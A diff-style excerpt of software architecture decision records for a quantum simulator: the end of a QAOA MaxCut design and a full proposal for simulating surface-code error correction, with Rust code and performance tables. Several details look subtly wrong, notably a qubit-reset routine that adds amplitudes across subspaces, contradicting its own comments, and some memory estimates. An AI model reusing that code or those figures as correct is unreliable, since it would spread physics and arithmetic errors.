#### Gate Counts and Timing
For a graph with n vertices, m edges, and QAOA depth p:
| Operation | Gate Count per Layer | Total Gates (p layers) |
|-----------|---------------------|----------------------|
| Phase separation (Rzz) | m | p * m |
| Mixing (Rx) | n | p * n |
| **Total per layer** | **m + n** | **p * (m + n)** |
**Benchmark estimates**:
| Configuration | n | m | p | Total Gates | Estimated Time |
|---------------|---|---|---|-------------|---------------|
| Small triangle | 3 | 3 | 1 | 6 | <0.01ms |
| Petersen graph | 10 | 15 | 3 | 75 | <0.1ms |
| Random d-reg (d=3) | 10 | 15 | 5 | 125 | <0.5ms |
| Grid 4x5 | 20 | 31 | 3 | 189 | ~50ms |
| Grid 4x5 | 20 | 31 | 5 | 315 | ~100ms |
| Random d-reg (d=4) | 20 | 40 | 5 | 400 | ~200ms |
| Dense (complete) | 20 | 190 | 3 | 630 | ~300ms |
| Sparse large | 24 | 36 | 3 | 216 | ~5s |
| Dense large | 24 | 276 | 5 | 1500 | ~30s |
**Memory requirements**:
| Qubits | State Vector Size | Memory |
|--------|------------------|--------|
| 10 | 1,024 | 16 KB |
| 16 | 65,536 | 1 MB |
| 20 | 1,048,576 | 16 MB |
| 24 | 16,777,216 | 256 MB |
| 28 | 268,435,456 | 4 GB |
### 9. Integration with ruvector-graph
The connection to ruVector's graph database enables a powerful workflow:
```
┌─────────────────────────────────────────────────────────────────────┐
│ QAOA MaxCut Pipeline │
│ │
│ ┌──────────────┐ ┌────────────────┐ ┌──────────────────┐ │
│ │ ruvector-graph│ │ QAOA Engine │ │ Result Store │ │
│ │ │ │ │ │ │ │
│ │ Query: │────>│ Build circuit │────>│ Optimal cut │ │
│ │ "find all │ │ Optimize │ │ Partition │ │
│ │ connected │ │ Sample │ │ Approximation │ │
│ │ subgraphs │ │ │ │ ratio │ │
│ │ of size k" │ │ │ │ │ │
│ └──────────────┘ └────────────────┘ └──────────────────┘ │
│ │
│ Data Flow: │
│ 1. Agent queries ruvector-graph for subgraph │
│ 2. Graph converted to QAOA format via Graph::from_ruvector_query() │
│ 3. QAOA optimizer runs with configurable depth p │
│ 4. Results stored in ruVector memory for pattern learning │
│ 5. Agent uses learned patterns to choose p and initial parameters │
└─────────────────────────────────────────────────────────────────────┘
```
The ruvector-mincut integration is particularly relevant: the existing
`SubpolynomialMinCut` algorithm (El-Hayek/Henzinger/Li, O(n^{o(1)}) amortized) provides
exact min-cut values that serve as a lower bound for MaxCut verification. QAOA solutions
can be validated against this classical baseline.
---
## Consequences
### Benefits
1. **Native Rzz gate** via direct amplitude manipulation avoids CNOT decomposition,
yielding a simpler and faster phase separation implementation
2. **PauliSum expectation API reuse** from ADR-QE-005 provides a unified interface for
all variational algorithms (VQE, QAOA, and future extensions)
3. **Graph interface flexibility** supports adjacency lists, edge lists, and ruVector
graph queries, covering the most common input formats
4. **Tensor network fallback** for low-treewidth graphs extends QAOA to larger problem
instances than pure state vector simulation allows
5. **ruvector-graph integration** enables a seamless pipeline from graph storage to
quantum optimization to result analysis
### Risks
| Risk | Probability | Impact | Mitigation |
|------|------------|--------|------------|
| QAOA at low depth p gives poor approximation ratios | High | Medium | Support high-p QAOA, classical warm-starting |
| Treewidth estimation is NP-hard in general | Medium | Low | Use heuristic upper bounds (min-degree, greedy) |
| Parameter landscape has many local minima | Medium | Medium | Multi-start optimization, INTERP initialization |
| Large dense graphs exhaust memory | Medium | High | Tensor network fallback, graph coarsening |
### Trade-offs
| Decision | Advantage | Disadvantage |
|----------|-----------|--------------|
| Direct Rzz over CNOT decomposition | Simpler, faster | Not a one-to-one hardware circuit mapping |
| Exact expectation over sampling | No statistical noise | Does not model real hardware shot noise |
| Automatic strategy selection | Transparent to user | Additional complexity in simulation backend |
| Integrated graph interface | Seamless workflow | Coupling to ruvector-graph API |
---
## References
- Farhi, E., Goldstone, J., Gutmann, S. "A Quantum Approximate Optimization Algorithm." arXiv:1411.4028 (2014)
- Hadfield, S. et al. "From the Quantum Approximate Optimization Algorithm to a Quantum Alternating Operator Ansatz." Algorithms 12, 34 (2019)
- Zhou, L. et al. "Quantum Approximate Optimization Algorithm: Performance, Mechanism, and Implementation on Near-Term Devices." Physical Review X 10, 021067 (2020)
- Guerreschi, G.G., Matsuura, A.Y. "QAOA for Max-Cut requires hundreds of qubits for quantum speed-up." Scientific Reports 9, 6903 (2019)
- ADR-001: ruQu Architecture - Classical Nervous System for Quantum Machines
- ADR-QE-005: VQE Algorithm Support (shared parameterized circuit and optimizer infrastructure)
- ADR-QE-006: Grover's Search Implementation (quantum state manipulation primitives)
- ruvector-mincut: `crates/ruvector-mincut/` - El-Hayek/Henzinger/Li subpolynomial min-cut
- ruvector-graph: graph database integration for sourcing MaxCut instances

View File

@@ -0,0 +1,997 @@
# ADR-QE-008: Surface Code Error Correction Simulation
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-06 | ruv.io | Initial surface code QEC simulation proposal |
---
## Context
### The Importance of QEC Simulation
Quantum Error Correction (QEC) is the bridge between noisy intermediate-scale quantum
(NISQ) devices and fault-tolerant quantum computing. Before deploying error correction
on real hardware, every aspect of the QEC stack must be validated through simulation:
1. **Decoder validation**: Verify that decoding algorithms (MWPM, Union-Find, neural
decoders) produce correct corrections under various noise models
2. **Threshold estimation**: Determine the physical error rate below which logical error
rate decreases with increasing code distance
3. **Architecture exploration**: Compare surface code layouts, flag qubit placements, and
scheduling strategies
4. **Noise model development**: Test decoder robustness against realistic noise (correlated
errors, leakage, crosstalk)
### Surface Codes as the Leading Architecture
The surface code is the most promising QEC architecture for superconducting qubit
platforms due to:
| Property | Value |
|----------|-------|
| Error threshold | ~1% (highest among practical codes) |
| Connectivity | Nearest-neighbor only (matches hardware) |
| Syndrome extraction | Local stabilizer measurements |
| Decoding | Efficient MWPM, Union-Find in O(n * alpha(n)) |
### Surface Code Layout (Distance-3)
```
Distance-3 Rotated Surface Code:
Data qubits: D0..D8 (9 total)
X-stabilizers: X0..X3 (4 ancilla qubits)
Z-stabilizers: Z0..Z3 (4 ancilla qubits)
Z0 Z1
/ \ / \
D0 ──── D1 ──── D2
| X0 | X1 |
D3 ──── D4 ──── D5
| X2 | X3 |
D6 ──── D7 ──── D8
\ / \ /
Z2 Z3
Qubit count: 9 data + 8 ancilla = 17 total qubits
State vector: 2^17 = 131,072 complex amplitudes
Memory: 2 MB per state vector
```
### What ruQu Provides Today
The existing ruQu crate already implements key components for error correction:
| Component | Module | Status |
|-----------|--------|--------|
| Syndrome processing | `syndrome.rs` | Production-ready (1M rounds/sec) |
| MWPM decoder | `decoder.rs` | Integrated via fusion-blossom |
| Min-cut coherence | `mincut.rs` | El-Hayek/Henzinger/Li algorithm |
| Three-filter pipeline | `filters.rs` | Structural + Shift + Evidence |
| Tile architecture | `tile.rs`, `fabric.rs` | 256-tile WASM fabric |
| Stim integration | `stim.rs` | Syndrome generation |
What is **missing** is the ability to simulate the full quantum state evolution of a
surface code cycle: ancilla initialization, stabilizer circuits, projective measurement,
state collapse, decoder feedback, and correction application. This ADR fills that gap.
### Requirements
| Requirement | Description | Priority |
|-------------|-------------|----------|
| Mid-circuit measurement | Projective measurement of individual qubits | P0 |
| Qubit reset | Reinitialize ancilla qubits to |0> each cycle | P0 |
| Conditional operations | Apply gates conditioned on measurement outcomes | P0 |
| Noise injection | Depolarizing, bit-flip, phase-flip channels | P0 |
| Syndrome extraction | Extract syndrome bits from ancilla measurements | P0 |
| Decoder integration | Feed syndromes to MWPM/min-cut decoder | P0 |
| Logical error tracking | Determine if logical error occurred | P1 |
| Multi-cycle simulation | Run thousands of QEC cycles efficiently | P1 |
| Leakage modeling | Simulate qubit leakage to non-computational states | P2 |
---
## Decision
### 1. Mid-Circuit Measurement
Mid-circuit measurement is the most critical new capability. Unlike final-state
measurement (which collapses the entire state), mid-circuit measurement collapses a
single qubit while preserving the rest of the system for continued evolution.
**Mathematical formulation**:
For measuring qubit q in the computational basis:
1. Split the state into two subspaces:
- |psi_0>: amplitudes where qubit q = 0
- |psi_1>: amplitudes where qubit q = 1
2. Compute probabilities:
- P(0) = ||psi_0||^2 = sum_{k: bit_q(k)=0} |amp_k|^2
- P(1) = ||psi_1||^2 = sum_{k: bit_q(k)=1} |amp_k|^2
3. Sample outcome m in {0, 1} according to P(0), P(1)
4. Collapse: zero out amplitudes in the non-selected subspace
5. Renormalize: divide remaining amplitudes by sqrt(P(m))
```rust
/// Result of a mid-circuit measurement.
pub struct MeasurementResult {
/// The measured qubit index
pub qubit: usize,
/// The measurement outcome (0 or 1)
pub outcome: u8,
/// The probability of this outcome
pub probability: f64,
}
impl QuantumState {
/// Perform a projective measurement on a single qubit.
///
/// This collapses the qubit to |0> or |1> based on Born probabilities,
/// zeroes out amplitudes in the rejected subspace, and renormalizes.
///
/// The remaining qubits are left in a valid quantum state for continued
/// simulation (essential for mid-circuit measurement in QEC).
///
/// Complexity: O(2^n) -- two passes over the state vector.
/// Pass 1: Compute probabilities P(0), P(1)
/// Pass 2: Collapse and renormalize
pub fn measure_qubit(
&mut self,
qubit: usize,
rng: &mut impl Rng,
) -> MeasurementResult {
let mask = 1_usize << qubit;
let n = self.amplitudes.len();
// Pass 1: Compute P(0) and P(1)
let mut prob_0 = 0.0_f64;
let mut prob_1 = 0.0_f64;
for k in 0..n {
let p = self.amplitudes[k].norm_sqr();
if (k & mask) == 0 {
prob_0 += p;
} else {
prob_1 += p;
}
}
// Sample outcome
let outcome = if rng.gen::<f64>() < prob_0 { 0_u8 } else { 1_u8 };
let prob_selected = if outcome == 0 { prob_0 } else { prob_1 };
let norm_factor = 1.0 / prob_selected.sqrt();
// Pass 2: Collapse and renormalize
for k in 0..n {
let bit = ((k & mask) >> qubit) as u8;
if bit == outcome {
self.amplitudes[k] *= norm_factor;
} else {
self.amplitudes[k] = Complex64::zero();
}
}
MeasurementResult {
qubit,
outcome,
probability: prob_selected,
}
}
/// Measure multiple qubits (ancilla register).
///
/// Measures each qubit sequentially. The order matters because each
/// measurement collapses the state before the next measurement.
/// For stabilizer measurements, this correctly handles correlated outcomes.
pub fn measure_qubits(
&mut self,
qubits: &[usize],
rng: &mut impl Rng,
) -> Vec<MeasurementResult> {
qubits.iter()
.map(|&q| self.measure_qubit(q, rng))
.collect()
}
}
```
### 2. Qubit Reset
Ancilla qubits must be reinitialized to |0> at the start of each syndrome extraction
cycle. The reset operation projects onto the |0> subspace and renormalizes:
```rust
impl QuantumState {
/// Reset a qubit to |0>.
///
/// Zeroes out all amplitudes where qubit q = 1, then renormalizes.
/// This is equivalent to measuring the qubit and, if the outcome is |1>,
/// applying an X gate to flip it back to |0>.
///
/// Complexity: O(2^n) -- single pass over state vector.
///
/// Used for ancilla reinitialization in each QEC cycle.
pub fn reset_qubit(&mut self, qubit: usize) {
let mask = 1_usize << qubit;
let partner_mask = !mask;
let n = self.amplitudes.len();
// For each pair of states (k, k XOR mask), move amplitude from
// the |1> component to the |0> component.
// This implements: |0><0| + |0><1| (measure-then-flip).
//
// Simpler approach: zero out |1> subspace, renormalize.
let mut norm_sq = 0.0_f64;
for k in 0..n {
if (k & mask) != 0 {
// Qubit q is |1> in this basis state
// Transfer amplitude to partner state with q = |0>
let partner = k & partner_mask;
// Coherent reset: add amplitudes
// For incoherent reset (thermal): would zero out instead
self.amplitudes[partner] += self.amplitudes[k];
self.amplitudes[k] = Complex64::zero();
}
}
// Renormalize
for k in 0..n {
norm_sq += self.amplitudes[k].norm_sqr();
}
let norm_factor = 1.0 / norm_sq.sqrt();
for amp in self.amplitudes.iter_mut() {
*amp *= norm_factor;
}
}
}
```
### 3. Noise Model
We implement three standard noise channels plus a combined depolarizing model.
Noise is applied by stochastically inserting Pauli gates after specified operations.
```
Noise Channels:
Bit-flip (X): rho -> (1-p) * rho + p * X * rho * X
Phase-flip (Z): rho -> (1-p) * rho + p * Z * rho * Z
Depolarizing: rho -> (1-p) * rho + p/3 * (X*rho*X + Y*rho*Y + Z*rho*Z)
```
For state vector simulation, noise is applied via **stochastic Pauli insertion**:
```rust
/// Noise model configuration.
#[derive(Debug, Clone)]
pub struct NoiseModel {
/// Single-qubit gate error rate
pub single_qubit_error: f64,
/// Two-qubit gate error rate
pub two_qubit_error: f64,
/// Measurement error rate (readout bit-flip)
pub measurement_error: f64,
/// Idle error rate (per qubit per cycle)
pub idle_error: f64,
/// Noise type
pub noise_type: NoiseType,
}
#[derive(Debug, Clone, Copy)]
pub enum NoiseType {
/// Random X errors with probability p
BitFlip,
/// Random Z errors with probability p
PhaseFlip,
/// Random X, Y, or Z errors each with probability p/3
Depolarizing,
/// Independent bit-flip (p_x) and phase-flip (p_z)
Independent { p_x: f64, p_z: f64 },
}
impl QuantumState {
/// Apply a noise channel to a single qubit.
///
/// For depolarizing noise with probability p:
/// - With probability 1-p: do nothing
/// - With probability p/3: apply X
/// - With probability p/3: apply Y
/// - With probability p/3: apply Z
///
/// This stochastic Pauli insertion is exact for Pauli channels
/// and a good approximation for general noise (Pauli twirl).
pub fn apply_noise(
&mut self,
qubit: usize,
error_rate: f64,
noise_type: NoiseType,
rng: &mut impl Rng,
) {
match noise_type {
NoiseType::BitFlip => {
if rng.gen::<f64>() < error_rate {
self.apply_x(qubit);
}
}
NoiseType::PhaseFlip => {
if rng.gen::<f64>() < error_rate {
self.apply_z(qubit);
}
}
NoiseType::Depolarizing => {
let r = rng.gen::<f64>();
if r < error_rate / 3.0 {
self.apply_x(qubit);
} else if r < 2.0 * error_rate / 3.0 {
self.apply_y(qubit);
} else if r < error_rate {
self.apply_z(qubit);
}
// else: no error (identity)
}
NoiseType::Independent { p_x, p_z } => {
if rng.gen::<f64>() < p_x {
self.apply_x(qubit);
}
if rng.gen::<f64>() < p_z {
self.apply_z(qubit);
}
}
}
}
/// Apply idle noise to all data qubits.
///
/// Called once per QEC cycle to model decoherence during idle periods.
pub fn apply_idle_noise(
&mut self,
data_qubits: &[usize],
noise: &NoiseModel,
rng: &mut impl Rng,
) {
for &q in data_qubits {
self.apply_noise(q, noise.idle_error, noise.noise_type, rng);
}
}
}
```
### 4. Syndrome Extraction Circuit
A complete surface code syndrome extraction cycle consists of:
1. Reset ancilla qubits to |0>
2. Apply CNOT chains from data qubits to ancilla (stabilizer circuits)
3. Measure ancilla qubits to extract syndrome bits
4. (Optionally) apply noise after each gate
```
Syndrome Extraction for X-Stabilizer X0 = X_D0 * X_D1 * X_D3 * X_D4:
D0: ────────●───────────────────────────
D1: ────────┼──────●────────────────────
│ │
D3: ────────┼──────┼──────●─────────────
│ │ │
D4: ────────┼──────┼──────┼──────●──────
│ │ │ │
X0: ──|0>──[H]──CNOT──CNOT──CNOT──CNOT──[H]──[M]── syndrome bit
(For X-stabilizers: Hadamard on ancilla before and after CNOTs)
(For Z-stabilizers: CNOTs in opposite direction, no Hadamards)
```
```rust
/// Surface code layout definition.
pub struct SurfaceCodeLayout {
/// Code distance
pub distance: usize,
/// Data qubit indices
pub data_qubits: Vec<usize>,
/// X-stabilizer definitions: (ancilla_qubit, [data_qubits])
pub x_stabilizers: Vec<(usize, Vec<usize>)>,
/// Z-stabilizer definitions: (ancilla_qubit, [data_qubits])
pub z_stabilizers: Vec<(usize, Vec<usize>)>,
/// Total qubit count (data + ancilla)
pub total_qubits: usize,
}
impl SurfaceCodeLayout {
/// Generate a distance-d rotated surface code layout.
pub fn rotated(distance: usize) -> Self {
let n_data = distance * distance;
let n_x_stab = (distance * distance - 1) / 2;
let n_z_stab = (distance * distance - 1) / 2;
let total = n_data + n_x_stab + n_z_stab;
// Assign qubit indices:
// 0..n_data: data qubits
// n_data..n_data+n_x_stab: X-stabilizer ancillae
// n_data+n_x_stab..total: Z-stabilizer ancillae
let data_qubits: Vec<usize> = (0..n_data).collect();
// Build stabilizer mappings based on rotated surface code geometry
let (x_stabilizers, z_stabilizers) =
build_rotated_stabilizers(distance, n_data);
Self {
distance,
data_qubits,
x_stabilizers,
z_stabilizers,
total_qubits: total,
}
}
}
/// One complete syndrome extraction cycle.
///
/// Returns the syndrome bitstring (one bit per stabilizer).
pub fn extract_syndrome(
state: &mut QuantumState,
layout: &SurfaceCodeLayout,
noise: &Option<NoiseModel>,
rng: &mut impl Rng,
) -> SyndromeBits {
let mut syndrome = SyndromeBits::new(
layout.x_stabilizers.len() + layout.z_stabilizers.len()
);
// Step 1: Reset all ancilla qubits
for &(ancilla, _) in layout.x_stabilizers.iter()
.chain(layout.z_stabilizers.iter())
{
state.reset_qubit(ancilla);
}
// Step 2: X-stabilizer circuits
for (stab_idx, &(ancilla, ref data)) in layout.x_stabilizers.iter().enumerate() {
// Hadamard on ancilla (transforms Z-basis CNOT to X-basis measurement)
state.apply_hadamard(ancilla);
if let Some(ref n) = noise {
state.apply_noise(ancilla, n.single_qubit_error, n.noise_type, rng);
}
// CNOT from each data qubit to ancilla
for &d in data {
state.apply_cnot(d, ancilla);
if let Some(ref n) = noise {
state.apply_noise(d, n.two_qubit_error, n.noise_type, rng);
state.apply_noise(ancilla, n.two_qubit_error, n.noise_type, rng);
}
}
// Hadamard on ancilla
state.apply_hadamard(ancilla);
if let Some(ref n) = noise {
state.apply_noise(ancilla, n.single_qubit_error, n.noise_type, rng);
}
// Measure ancilla
let result = state.measure_qubit(ancilla, rng);
// Apply measurement error
let mut outcome = result.outcome;
if let Some(ref n) = noise {
if rng.gen::<f64>() < n.measurement_error {
outcome ^= 1; // Flip the classical bit
}
}
syndrome.set(stab_idx, outcome);
}
// Step 3: Z-stabilizer circuits
let offset = layout.x_stabilizers.len();
for (stab_idx, &(ancilla, ref data)) in layout.z_stabilizers.iter().enumerate() {
// No Hadamard for Z-stabilizers
// CNOT from ancilla to each data qubit
for &d in data {
state.apply_cnot(ancilla, d);
if let Some(ref n) = noise {
state.apply_noise(d, n.two_qubit_error, n.noise_type, rng);
state.apply_noise(ancilla, n.two_qubit_error, n.noise_type, rng);
}
}
// Measure ancilla
let result = state.measure_qubit(ancilla, rng);
let mut outcome = result.outcome;
if let Some(ref n) = noise {
if rng.gen::<f64>() < n.measurement_error {
outcome ^= 1;
}
}
syndrome.set(offset + stab_idx, outcome);
}
// Step 4: Apply idle noise to data qubits
if let Some(ref n) = noise {
state.apply_idle_noise(&layout.data_qubits, n, rng);
}
syndrome
}
```
### 5. Decoder Integration
The syndrome bits feed into ruQu's existing decoder infrastructure:
```
Decoder Pipeline:
Syndrome Bits ──> SyndromeFilter ──> MWPM Decoder ──> Correction ──> Apply to State
│ │
│ ┌─────▼─────┐
│ │ ruvector- │
│ │ mincut │
└──────────────────────────────│ coherence │
│ validation │
└────────────┘
```
```rust
/// Decode syndrome and apply corrections.
///
/// This function bridges the quantum simulation (state vector) with
/// ruQu's classical decoder infrastructure.
pub fn decode_and_correct(
state: &mut QuantumState,
syndrome: &SyndromeBits,
layout: &SurfaceCodeLayout,
decoder: &mut MWPMDecoder,
) -> DecoderResult {
// Convert syndrome bits to DetectorBitmap (ruQu format)
let mut bitmap = DetectorBitmap::new(syndrome.len());
for i in 0..syndrome.len() {
bitmap.set(i, syndrome.get(i) == 1);
}
// Decode using MWPM
let correction = decoder.decode(&bitmap);
// Apply X corrections to data qubits
for &qubit in &correction.x_corrections {
state.apply_x(qubit);
}
// Apply Z corrections to data qubits
for &qubit in &correction.z_corrections {
state.apply_z(qubit);
}
DecoderResult {
correction,
syndrome: bitmap,
applied: true,
}
}
```
Integration with `ruvector-mincut` for coherence validation:
```rust
/// Validate decoder correction using min-cut coherence analysis.
///
/// Uses ruQu's existing DynamicMinCutEngine to assess whether the
/// post-correction state maintains structural coherence.
pub fn validate_correction(
syndrome: &SyndromeBits,
correction: &Correction,
mincut_engine: &mut DynamicMinCutEngine,
) -> CoherenceAssessment {
// Update min-cut graph edges based on syndrome pattern
// High syndrome density in a region lowers edge weights (less coherent)
// Correction success restores edge weights
let cut_value = mincut_engine.query_min_cut();
CoherenceAssessment {
min_cut_value: cut_value.value,
is_coherent: cut_value.value > COHERENCE_THRESHOLD,
witness: cut_value.witness_hash,
}
}
```
### 6. Logical Error Tracking
To determine if a logical error has occurred, we compare the initial and final
logical qubit states:
```rust
/// Track logical errors across QEC cycles.
///
/// A logical error occurs when the cumulative effect of physical errors
/// and decoder corrections results in a non-trivial logical operator
/// being applied to the encoded qubit.
pub struct LogicalErrorTracker {
/// Accumulated X corrections on data qubits
x_correction_parity: Vec<bool>,
/// Accumulated Z corrections on data qubits
z_correction_parity: Vec<bool>,
/// Known physical X errors (for debugging/validation)
x_error_parity: Vec<bool>,
/// Known physical Z errors
z_error_parity: Vec<bool>,
/// Logical X operator support (which data qubits)
logical_x_support: Vec<usize>,
/// Logical Z operator support
logical_z_support: Vec<usize>,
}
impl LogicalErrorTracker {
/// Check if a logical X error has occurred.
///
/// A logical X error occurs when the net X-type operator
/// (errors + corrections) has odd overlap with the logical Z operator.
pub fn has_logical_x_error(&self) -> bool {
let mut parity = false;
for &q in &self.logical_z_support {
parity ^= self.x_error_parity[q] ^ self.x_correction_parity[q];
}
parity
}
/// Check if a logical Z error has occurred.
pub fn has_logical_z_error(&self) -> bool {
let mut parity = false;
for &q in &self.logical_x_support {
parity ^= self.z_error_parity[q] ^ self.z_correction_parity[q];
}
parity
}
/// Check if any logical error has occurred.
pub fn has_logical_error(&self) -> bool {
self.has_logical_x_error() || self.has_logical_z_error()
}
}
```
### 7. Full Surface Code Simulation Cycle
Putting it all together, the complete simulation loop:
```
Full Surface Code QEC Cycle
============================
Input: Code distance d, noise model, number of cycles T, decoder
Output: Logical error rate estimate
layout = SurfaceCodeLayout::rotated(d)
state = QuantumState::new(layout.total_qubits)
tracker = LogicalErrorTracker::new(layout)
decoder = MWPMDecoder::new(d)
mincut = DynamicMinCutEngine::new()
// Prepare initial logical |0> state
prepare_logical_zero(&mut state, &layout)
for cycle in 0..T:
┌─────────────────────────────────────────────────────┐
│ 1. INJECT NOISE │
│ Apply depolarizing noise to all data qubits │
│ (models decoherence during idle + gate errors) │
│ tracker.record_errors(noise_locations) │
└─────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────┐
│ 2. EXTRACT SYNDROME │
│ Reset ancillae -> stabilizer circuits -> measure │
│ Returns syndrome bitstring for this cycle │
└─────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────┐
│ 3. DECODE │
│ Feed syndrome to MWPM decoder │
│ Decoder returns correction (X and Z Pauli ops) │
└─────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────┐
│ 4. APPLY CORRECTION │
│ Apply Pauli corrections to data qubits │
│ tracker.record_corrections(corrections) │
└─────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────┐
│ 5. VALIDATE COHERENCE (optional) │
│ Run min-cut analysis on syndrome pattern │
│ Flag if coherence drops below threshold │
└─────────────────────────────────────────────────────┘
// After T cycles, check for logical error
logical_error = tracker.has_logical_error()
```
**Pseudocode for the full simulation**:
```rust
/// Run a complete surface code QEC simulation.
///
/// Returns the logical error rate estimated from `trials` independent runs,
/// each consisting of `cycles` QEC rounds.
pub fn simulate_surface_code(config: &SurfaceCodeConfig) -> SimulationResult {
let layout = SurfaceCodeLayout::rotated(config.distance);
let mut logical_errors = 0_u64;
let mut total_cycles = 0_u64;
for trial in 0..config.trials {
let mut state = QuantumState::new(layout.total_qubits);
let mut tracker = LogicalErrorTracker::new(&layout);
let mut decoder = MWPMDecoder::new(DecoderConfig {
distance: config.distance,
physical_error_rate: config.noise.idle_error,
..Default::default()
});
let mut rng = StdRng::seed_from_u64(config.seed + trial);
// Prepare logical |0>
prepare_logical_zero(&mut state, &layout);
for cycle in 0..config.cycles {
// 1. Inject noise
inject_data_noise(&mut state, &layout, &config.noise, &mut rng);
// 2. Extract syndrome
let syndrome = extract_syndrome(
&mut state, &layout, &Some(config.noise.clone()), &mut rng
);
// 3. Decode
let correction = decoder.decode_syndrome(&syndrome);
// 4. Apply correction
apply_correction(&mut state, &correction);
tracker.record_correction(&correction);
total_cycles += 1;
}
// Check for logical error
if tracker.has_logical_error() {
logical_errors += 1;
}
}
let logical_error_rate = logical_errors as f64 / config.trials as f64;
let error_per_cycle = 1.0 - (1.0 - logical_error_rate)
.powf(1.0 / config.cycles as f64);
SimulationResult {
logical_error_rate,
logical_error_per_cycle: error_per_cycle,
total_trials: config.trials,
total_cycles,
logical_errors,
distance: config.distance,
physical_error_rate: config.noise.idle_error,
}
}
```
### 8. Performance Estimates
#### Distance-3 Surface Code
| Parameter | Value |
|-----------|-------|
| Data qubits | 9 |
| Ancilla qubits | 8 |
| Total qubits | 17 |
| State vector entries | 2^17 = 131,072 |
| State vector memory | 2 MB |
| CNOTs per cycle | ~16 (4 per stabilizer, 4 stabilizers active) |
| Measurements per cycle | 8 |
| Resets per cycle | 8 |
| **Time per cycle** | **~0.5ms** |
| **1000 cycles** | **~0.5s** |
#### Distance-5 Surface Code
| Parameter | Value |
|-----------|-------|
| Data qubits | 25 |
| Ancilla qubits | 24 |
| Total qubits | 49 |
| State vector entries | 2^49 ~ 5.6 * 10^14 |
| State vector memory | **4 PB** (infeasible for full state vector) |
This highlights the fundamental scaling challenge: full state vector simulation of
distance-5 surface codes requires stabilizer simulation or tensor network methods,
not direct state vector evolution. However, for the critical distance-3 case, state
vector simulation is fast and provides ground truth.
**Practical simulation envelope**:
| Distance | Qubits | State Vector | Feasible? | Cycles/sec |
|----------|--------|-------------|-----------|------------|
| 2 (toy) | 7 | 128 entries | Yes | ~50,000 |
| 3 | 17 | 131K entries | Yes | ~2,000 |
| 3 (with noise) | 17 | 131K entries | Yes | ~1,000 |
| 4 | 31 | 2B entries | Marginal (16 GB) | ~0.1 |
| 5+ | 49+ | >10^14 | No (state vector) | -- |
For distance 5 and above, the implementation should fall back to **stabilizer
simulation** (Gottesman-Knill theorem: Clifford circuits on stabilizer states can be
simulated in polynomial time). Since surface code circuits consist entirely of Clifford
gates (H, CNOT, S) with Pauli noise, this is a natural fit.
### 9. Integration with Existing ruQu Pipeline
The surface code simulation integrates with the full ruQu stack:
```
┌─────────────────────────────────────────────────────────────────────┐
│ ruQu QEC Simulation Stack │
│ │
│ ┌─────────────┐ ┌──────────────┐ ┌───────────────────────────┐ │
│ │ State │ │ Syndrome │ │ Decoder Pipeline │ │
│ │ Vector │ │ Processing │ │ │ │
│ │ Engine │──│ (syndrome.rs)│──│ SyndromeFilter │ │
│ │ (new) │ │ │ │ ├── StructuralFilter │ │
│ │ │ │ DetectorBitmap │ │ ├── ShiftFilter │ │
│ │ measure() │ │ SyndromeBuffer │ │ ├── EvidenceFilter │ │
│ │ reset() │ │ SyndromeDelta │ │ └── MWPM Decoder │ │
│ │ noise() │ │ │ │ (decoder.rs) │ │
│ └─────────────┘ └──────────────┘ └───────────────────────────┘ │
│ │ │ │
│ │ ┌─────────────────────────┘ │
│ │ │ │
│ ▼ ▼ │
│ ┌──────────────────────────┐ ┌────────────────────────────────┐ │
│ │ Correction Application │ │ Coherence Validation │ │
│ │ │ │ │ │
│ │ apply_x(qubit) │ │ DynamicMinCutEngine │ │
│ │ apply_z(qubit) │ │ (mincut.rs) │ │
│ │ │ │ │ │
│ │ Logical Error Tracker │ │ El-Hayek/Henzinger/Li │ │
│ └──────────────────────────┘ │ O(n^{o(1)}) min-cut │ │
│ └────────────────────────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────────┐ │
│ │ Tile Architecture (fabric.rs, tile.rs) │ │
│ │ │ │
│ │ TileZero (coordinator) + 255 WorkerTiles │ │
│ │ Can parallelize across stabilizer groups for large codes │ │
│ └───────────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────────────┘
```
Key integration points:
1. **Syndrome bits** from `measure_qubit()` are converted to `DetectorBitmap` format
for compatibility with ruQu's existing syndrome processing pipeline
2. **MWPM decoder** from `decoder.rs` (backed by fusion-blossom) receives syndromes
and returns corrections
3. **Min-cut coherence** from `mincut.rs` validates post-correction state quality
4. **Tile architecture** from `fabric.rs` can distribute stabilizer measurements across
tiles for parallel processing of large codes
5. **Stim integration** from `stim.rs` provides reference syndrome distributions for
decoder benchmarking
### 10. Error Rate Estimation
To estimate the error threshold, we run simulations at multiple physical error rates
and code distances:
```rust
/// Estimate the error threshold by scanning physical error rates.
///
/// The threshold is the physical error rate p* at which logical error rate
/// is independent of code distance. Below p*, larger codes are better.
/// Above p*, larger codes are worse.
pub fn estimate_threshold(
distances: &[usize],
error_rates: &[f64],
cycles_per_trial: usize,
trials: usize,
) -> ThresholdResult {
let mut results = Vec::new();
for &d in distances {
for &p in error_rates {
let config = SurfaceCodeConfig {
distance: d,
noise: NoiseModel {
idle_error: p,
single_qubit_error: p / 10.0,
two_qubit_error: p,
measurement_error: p,
noise_type: NoiseType::Depolarizing,
},
cycles: cycles_per_trial,
trials: trials as u64,
seed: 42,
};
let sim_result = simulate_surface_code(&config);
results.push((d, p, sim_result.logical_error_per_cycle));
}
}
// Find crossing point of d=3 and d=5 curves
find_threshold_crossing(&results)
}
```
---
## Consequences
### Benefits
1. **Full quantum state simulation** provides ground truth for decoder validation that
stabilizer simulation alone cannot (e.g., non-Clifford noise, leakage states)
2. **Seamless integration** with ruQu's existing syndrome processing, MWPM decoder,
and min-cut coherence infrastructure minimizes new code and leverages battle-tested
components
3. **Mid-circuit measurement** and qubit reset enable accurate simulation of the actual
hardware QEC cycle, not just the error model
4. **Noise model flexibility** (bit-flip, phase-flip, depolarizing, independent) covers
the standard noise models used in QEC research
5. **Logical error tracking** provides direct measurement of the quantity of interest
(logical error rate) without post-hoc analysis
6. **Integration with min-cut coherence** validates that decoder corrections maintain
structural coherence, bridging ruQu's unique coherence-gating approach with standard
QEC metrics
